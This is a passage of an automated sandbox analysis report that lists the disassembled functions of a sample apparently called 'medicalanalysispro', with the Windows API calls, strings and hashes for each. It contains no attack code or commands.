                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FreeResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50FD
                                                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7600A3123), ref: 00007FF7600A60C9
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FF7600A6142
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: LoadStringA.USER32 ref: 00007FF7600A4E60
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: MessageBoxA.USER32 ref: 00007FF7600A4EA0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7700: GetLastError.KERNEL32 ref: 00007FF7600A7704
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                                                                                • String ID: $<None>$UPROMPT
                                                                                                                                                                                                                                                                                                                • API String ID: 957408736-2569542085
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 512b236293121cc024e675fdfaf647be61c726dd62d27b8e843b4623df455d29
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c89efd78b919c53ae921da62a7823d40fc529b0e6928f9f5a66cf62d4f2101d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB316171A08642C7F720AB24E5507BAFA61EB85784F848135DA0E46F9BDF7DF0648B30
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CreateFile$lstrcmp
                                                                                                                                                                                                                                                                                                                • String ID: *MEMCAB
                                                                                                                                                                                                                                                                                                                • API String ID: 1301100335-3211172518
                                                                                                                                                                                                                                                                                                                • Opcode ID: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 15993713d09b55aa165e28e738072db5bc23ea7388bd4cd5c8fd3a166cd08b3c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fab58b71c17961be18cd8b0539a41123d81d0c9073bbe07ec3ef194c0142598e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A961C566E08B41C6FB609B24A490379BA91FB45BA5F844331CA6E02BC9DF7CF5658730
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FileTime$AttributesDateItemLocalText
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                                                                                • API String ID: 851750970-1193786559
                                                                                                                                                                                                                                                                                                                • Opcode ID: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9199ec8922bcf428f2d7e60bf8957b66d0181ce290412cdd36528045288ea1fd
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94d827d004676d0e23b6a3eaf0944199c835ba76f01473357c705151827b719a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB519236A18A42D1EB60AB11D4502BDA7A0FB48B92FC44231D94E57B9FDE3CF565C370
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                                • String ID: TMP4351$.TMP
                                                                                                                                                                                                                                                                                                                • API String ID: 3494564517-2619824408
                                                                                                                                                                                                                                                                                                                • Opcode ID: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                                                                                                                                                                                                                                                                • Instruction ID: 139b5b5d08b7924e352f604f5c1d5975dd35efd946c9fb80c4aef26fdba04ed8
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 115a3f27e39781d027e0477db835a776448aec340d541b983af64270222d4fc0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A316171A18641C7F710AB25A41037AF660EB85BB5F845334DA6E47FDACF3CE4658720
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A3B40: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF7600A3A09), ref: 00007FF7600A3B64
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A3B40: PeekMessageA.USER32 ref: 00007FF7600A3B89
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A3B40: PeekMessageA.USER32 ref: 00007FF7600A3BCD
                                                                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE ref: 00007FF7600A56E4
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1084409-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2efc40693eff36cc330d81f6f4898726f7ab29a1a209d93e75f26ed29f9ec99d
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a76a806002c51afc5401a5001571f8213dae6f688e945ba72fdbdbea0bf890e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B217C34A08542C6E710AB15E844779F7A0FB85B94F948235D96D06FAADF3DF425CB30
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2018477427-0
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CharPrev
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 122130370-0
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                                                                                                                                                                                                                                                                • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$ham
                                                                                                                                                                                                                                                                                                                • API String ID: 3530494346-2394228924
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                                                                                                • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                • API String ID: 2829607268-3733053543
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                                                                                                                                                                                                                                • Instruction ID: a6d5e24291e268420b9f9d45f8964d24cc179b35b08d7c5a4339d27312a9d4ff
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4521A072A18A42C7F750AB60E0557BAFBA0FB89745F809135DA4E06F59CF3CE054CB20
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 4104442557-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4f270b99c94daf7618a64b5e305b62bcdc3699ad7da27fd75f7737df50061c50
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF115E22B04B41CBEB00EF61E8446A873A4FB4D758F810A31EA6D47B59DF7CE5B58360
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                                                                                • String ID: "$:$@$RegServer
                                                                                                                                                                                                                                                                                                                • API String ID: 1203814774-4077547207
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                                                                                                                                                                                                                                • Instruction ID: c26c9b98634b6cb30d261194bed0a7901294d763a2aa955ca8897d7610dee104
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE02E322E0C682C1FA65AB289C146B9EBA1AF45740FD88535D95E06F9FCE3DF521C730
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                                                                                                                                                                                                                                                • String ID: $ham
                                                                                                                                                                                                                                                                                                                • API String ID: 2654313074-563232235
                                                                                                                                                                                                                                                                                                                • Opcode ID: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
                                                                                                                                                                                                                                                                                                                • Instruction ID: f471ffb87abe12179d77602bf426da30df40bba54e8b89c26ee5e1225522a500
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE517231A08A42C6E710AB11E844679FAA1FB8DB55F859231DA1E07F9ECF3CB465C730
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4A86
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4AAA
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4ACA
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4AEC
                                                                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4B1B
                                                                                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4B3A
                                                                                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4B54
                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32 ref: 00007FF7600A4BF1
                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4C0D
                                                                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                                                                                • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                                                                                                                                                                                                                                • Instruction ID: fa30dd9a1f49d92df466ef93e697eb6fd2744e2191ddce6444c54c45866dd3e4
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87516E25A09B82D6E641AB11A8105BAFBA0FB89B90FC54534DE4E07F9ADF3CF454C730
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                                                                                • String ID: ham$rce.
                                                                                                                                                                                                                                                                                                                • API String ID: 2929476258-2218604853
                                                                                                                                                                                                                                                                                                                • Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                                                                                                                                                                                                                                • Instruction ID: da1c990a1c05ae876b899f74a8572a2c9be6e2fa01386a65c3ad2b7162bef76f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF61C425E087C1D6FB11AB25A8007B9EA90FB99794F845230DE4D07B9ADF3CF5568730
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                                                                                • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 61a87e31acd400d40ef357cff5fb8e23ded08d2ebc1280b22789dab271abe08a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3351A472718681C6EB10AB15E8402BEFBA0FB89B90F945031DA4E07F5ACF3DE955C720
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                                                                                • String ID: ham
                                                                                                                                                                                                                                                                                                                • API String ID: 3785188418-4133487753
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
                                                                                                                                                                                                                                                                                                                • Instruction ID: a76acdea6419a334f43616a81a7e7adae7dd36b62710b23487c3116bcd425be4
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01316635E08A42CAE6156B64E8042B5FB91FB8EB51FD49330D91E06B9ADF3DB065C730
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2168512254-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8abc4b5e7514813695d43bfd58c4de3bfbf96ae5c1d2aaa09d88cbc017a4327c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6516132704A42CBE710AF25E4406F9BBA4FB4DB88F825135DA0E53B59DF39E464CB60
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 12227f38b9e39e4bdb424c53dede36a4cefd7daea9cbd1c0620263855bad52fc
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03519432A08A82CAE7509B24D4406BDF7A1FB88B50F854531DA6D03B9ADF7DF558CB30
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1051330783-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4c0f82a7db4bee0280cda1b8575c7e0ab65716179fefdfcc6eca1e120c27b863
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7516432B04642CBEB109F1A94006B9B7A4FB49B94F945131DE0D67B99DF39F8A1C730
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
